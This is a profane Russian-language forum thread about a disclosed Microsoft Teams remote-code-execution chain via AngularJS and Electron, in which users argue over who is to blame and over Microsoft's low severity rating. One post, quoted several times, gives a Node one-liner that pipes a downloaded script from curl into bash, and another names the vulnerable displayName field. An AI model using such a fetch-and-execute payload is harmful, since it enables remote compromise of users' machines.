Программирование[9]

Зачем постить ссылку на какой-то хуевый русскоязычный канал в телеге вместо того, чтобы просто линкануть на гитхабовский репозиторий, где полнейший разъеб в ридми? https://github.com/oskarsve/ms-teams-rce

Сейчас бы читать этот бойлерплейт.

tl:dr "МАЙКРОСОФТ СОСНУЛИ" 

там вся мякотка в том, что майкрософт классифицировали уязвимость как "Important, Spoofing (one of the lowest in-scope ratings possible)" и автор в ридми бугуртит, показывая, какой атомный разъеб можно устроить уязвимостью, которой дали такой рейтинг))

ух ты дырявый электрон протек в очередной раз, ну нихуя ж себе майкрософт пидорасы, наверное они с нуля песочницу писали

я мб не так помню. но обычно он постит чисто свои девелоперские радости, т.е. развитие тех инструментов которые он использует, которые из экосистемы C#

думаю ему поебать за бренд МС в целом так и за отдельный продукт в частности

но новость всеравно интересная, спасибо

Kant написал 25 минут назад:

ух ты дырявый электрон протек в очередной раз, ну нихуя ж себе майкрософт пидорасы, наверное они с нуля песочницу писали

ну логично что они выпуская продукт на его основе отвечают за выбор технологии и отвечают и юридически и экономически перед потребителями. так что если не уверены в электроне - пишите свое, их никто не заставлял это использовать. если у них конечно нет контракта с "электроном" на поставку модуля/платформы/библиотеки которая удовлетворяет параметрам безопастности - тогда соглашусь что ответственность не на МС, а на некоем подрядчике

Kant написал 46 минут назад:

ух ты дырявый электрон протек в очередной раз, ну нихуя ж себе майкрософт пидорасы, наверное они с нуля песочницу писали

А какая разница электрон или не электрон. RCE оно и в сендбоксе RCE.

Что-то у дискорда, слака и прочей хуйне на электроне проблем нет.

Just.Doit написал 1 час назад:

я мб не так помню. но обычно он постит чисто свои девелоперские радости, т.е. развитие тех инструментов которые он использует, которые из экосистемы C#

думаю ему поебать за бренд МС в целом так и за отдельный продукт в частности

 

но новость всеравно интересная, спасибо

Kant написал 1 час назад:

ух ты дырявый электрон протек в очередной раз, ну нихуя ж себе майкрософт пидорасы, наверное они с нуля песочницу писали

ну логично что они выпуская продукт на его основе отвечают за выбор технологии и отвечают и юридически и экономически перед потребителями. так что если не уверены в электроне - пишите свое, их никто не заставлял это использовать. если у них конечно нет контракта с "электроном" на поставку модуля/платформы/библиотеки которая удовлетворяет параметрам безопастности - тогда соглашусь что ответственность не на МС, а на некоем подрядчике

 

ну тогда сам электрон должен отвечать за выбор винды?

или стрелочка не поворачивается?

Index написал 58 минут назад:

Kant написал 1 час назад:

ух ты дырявый электрон протек в очередной раз, ну нихуя ж себе майкрософт пидорасы, наверное они с нуля песочницу писали

А какая разница электрон или не электрон. RCE оно и в сендбоксе RCE.

Что-то у дискорда, слака и прочей хуйне на электроне проблем нет.

там же написано, что они просто сделали это сразу в тимсе (прорвав 3 каких-то защиты ангуляра при этом), и что все эти уязвимости потенциально работают на любом электроне с небольшими допиливаниями

это не отменяет, что мс долбоебы (главный долбоебизм в том, что они взяли электрон в принципе), но не надо на них всех собак вешать

Так там уязвимость в конкретном месте 

Цитата

In mention functionality, the vulnerable parameter is displayName within the

 { content: "...", properties: { "mentions" : "[{ displayName: PAYLOAD HERE }]"

 JSON message structure.

Если ты криворукий дебил и не допускаешь вероятность XSS верстая красотулечки особенно в полях значения которых прямо приходят от других пользователей, то собственно сосни хуйца.

Если у вас в йоба коммерческом продукте нет sanitize тестирования мануального/автоматизированного, то сосните хуйца х2.

А так плохому танцору яйца мешают. 

Электрон говно, ангуляр говно, бекендеры вы суки не валидируете нихуя!

Kant написал 18 минут назад:

ну тогда сам электрон должен отвечать за выбор винды?

нихуя не понял

если электрон опенсорс - он ни за что не отвечает он просто хуйня которая лежит в интернете

если это коммерческий продукт/услуга, то надо смотреть контракт

вот ты пишешь прилагу под винду

ты заключаешь с майкрософт договор что ли, что они обязаны отвечать как-то за баги в ядре ос, или вы просто шлете друг друга  нахуй, ведь за сапорт никто не платил?

Какая ответственность в том, что верстальщик не читал

https://angular.io/guide/security

Вина электрона тут только в том, что имеет прав дохуя. Но опять же это все тюнится и от этого не уйти если ты хочешь системное приложение управляемое JS кодом.

Kant написал 4 минуты назад:

вот ты пишешь прилагу под винду

ты заключаешь с майкрософт договор что ли, что они обязаны отвечать как-то за баги в ядре ос, или вы просто шлете друг друга  нахуй, ведь за сапорт никто не платил?

 

елси ты предоставляешь кому-то услугу и/или продаешь продукт

и в контракте/условиях исопльзования юридически заложены гарантии

то это твоя проблема чтобы твой продукт соответствовал требованиям безопастности

далее, я согласен что разработчик ПО должен полагаться на гарантии которые предоставляются нижележащими библиотеками/ПО и юридически закреплены, либо же проводить их полный аудит собственноручно для каждой версии. если ты думаешь "ну вроде норм ПО, проблем быть не должно" то ты сам себя ставишь в подобную ситуацию. либо проводи полный аудит всех исходников и всех поведений ПО, и отслеживай в открытом доступе всю инфу про уязвимости, которые 0-дей

либо соси хуй как компания/продукт которая предоставляет 0 гарантий безопастности

вообще проблема не в том что обнаружилась некая уязвимость, 0-дей уязвимости это вообще как бы чистый рандом и черный лебедь

проблема, насколько я понял читая по диагонали гитхаб, в том что в МС неоднократно сообщали и долбили притензиями, но они положили хуй

Index написал 4 минуты назад:

Какая ответственность в том, что верстальщик не читал

https://angular.io/guide/security

Вина электрона тут только в том, что имеет прав дохуя. Но опять же это все тюнится и от этого не уйти если ты хочешь системное приложение управляемое JS кодом.

бля я даже заквочу из ссылки мунфанга

What's in this report

AngularJS expression injection protection bypass

AngularJS sandbox escape to execute arbitrary JS

CSP bypass (via AngularJS)

Abuse of Microsoft Teams APIs to 'download and execute a file' to achieve RCE

An additional, universal Electron redacted RCE payload, which was included in the report's video/media attachments

Both RCE payloads allow to bypass Microsoft Teams specific Electron app security, but probably could be universally adapted to older ElectronJS versions with similar security constraints.

MS Teams ElectronJS security: remote-require is disabled & filtered, nodeIntegration is false, webview creation is filtered and normally removes insecure params/options. You cannot simply import child_process and execute arbitrary code or create a webview with a custom preload option.

обосрался ангуляр раз, два, три, похоже обосрались майкрософт, обосрался электрон при выбранных параметрах его защиты, на любых таких же будет работать аналогично

ну охуеть просто блять

Бекендеры - не установили лимит на размеры филдов и контент понадеявшись на фронт валидацию.

Верстальщики забили хуй на санитайзинг в неочевидном месте.

Электрон просто исполняет все с правами бога.

Сочетание всех факторов привело к такому печальному эффекту. Будь ограничение на длину имени было бы сложнее атаковать.

хотя для атаки хватит и 

require('child_process').exec('curl укорачивательссылок | bash');

Just.Doit написал 1 минуту назад:

Kant написал 6 минут назад:

вот ты пишешь прилагу под винду

ты заключаешь с майкрософт договор что ли, что они обязаны отвечать как-то за баги в ядре ос, или вы просто шлете друг друга  нахуй, ведь за сапорт никто не платил?

 

елси ты предоставляешь кому-то услугу и/или продаешь продукт

и в контракте/условиях исопльзования юридически заложены гарантии

то это твоя проблема чтобы твой продукт соответствовал требованиям безопастности

далее, я согласен что разработчик ПО должен полагаться на гарантии которые предоставляются нижележащими библиотеками, либо же проводить их полный аудит собственноручно для каждой версии.

 

вообще проблема не в том что обнаружилась некая уязвимость, 0-дей уязвимости это вообще как бы чистый рандом и черный лебедь

проблема, насколько я понял читая по диагонали гитхаб, в том что в МС неоднократно сообщали и долбили притензиями, но они положили хуй

ну собственно что и требовалось доказать, всем на всех похуй, майкрософт тоже хуй ложили на фиксы чужих багов

и претензия у челика, что он зарепортил, а майкрософт не присвоила багу категорию критикал, как должна была бы, а просто ипортант и всё подохло в бюрократии как обычно

Kant написал 2 минуты назад:

обосрался ангуляр раз, два, три, похоже обосрались майкрософт, обосрался электрон при выбранных параметрах его защиты, на любых таких же будет работать аналогично

ну охуеть просто блять

почему уязвим конкретный дисплейнейм?

Может потому что хуй забили на санитайзинг в нем

Index написал Только что:

Бекендеры - не установили лимит на размеры филдов и контент понадеявшись на фронт валидацию.

Верстальщики забили хуй на санитайзинг в неочевидном месте.

Электрон просто исполняет все с правами бога.

 

Сочетание всех факторов привело к такому печальному эффекту. Будь ограничение на длину имени было бы сложнее атаковать.

хотя для атаки хватит и 

require('child_process').exec('curl укорачивательссылок | bash');

 

Kant написал 2 минуты назад:

MS Teams ElectronJS security: remote-require is disabled & filtered, nodeIntegration is false, webview creation is filtered and normally removes insecure params/options. You cannot simply import child_process and execute arbitrary code or create a webview with a custom preload option.

А майкрософт не присвоит критикал по тем же причинам по которым взрывы газа называют хлопками.

С sh вместо bash даже короче будет на 2 символа. 

Kant написал 5 минут назад:

Index написал 7 минут назад:

Бекендеры - не установили лимит на размеры филдов и контент понадеявшись на фронт валидацию.

Верстальщики забили хуй на санитайзинг в неочевидном месте.

Электрон просто исполняет все с правами бога.

 

Сочетание всех факторов привело к такому печальному эффекту. Будь ограничение на длину имени было бы сложнее атаковать.

хотя для атаки хватит и 

require('child_process').exec('curl укорачивательссылок | bash');

 

Показать больше  

 

Kant написал 8 минут назад:

MS Teams ElectronJS security: remote-require is disabled & filtered, nodeIntegration is false, webview creation is filtered and normally removes insecure params/options. You cannot simply import child_process and execute arbitrary code or create a webview with a custom preload option.

 

А пруфы есть что это у MS такая политика на электрон стоит?

Может у них там какие-нибудь дёрти хаки. Пришло уведомление через @ отключаем секьюрити чтобы показать хуй в трее например.

МС игнорят баги, я им даже слать теперь не хочу. Походу коммерчески выгодно делать новые фичи, а не фиксить баги в старых

А есть вакансии на электроне ? Чёто не видел такого чтобы разрабов искали на него, наврятли кому из буржуев бизнеса нужны десктопные апы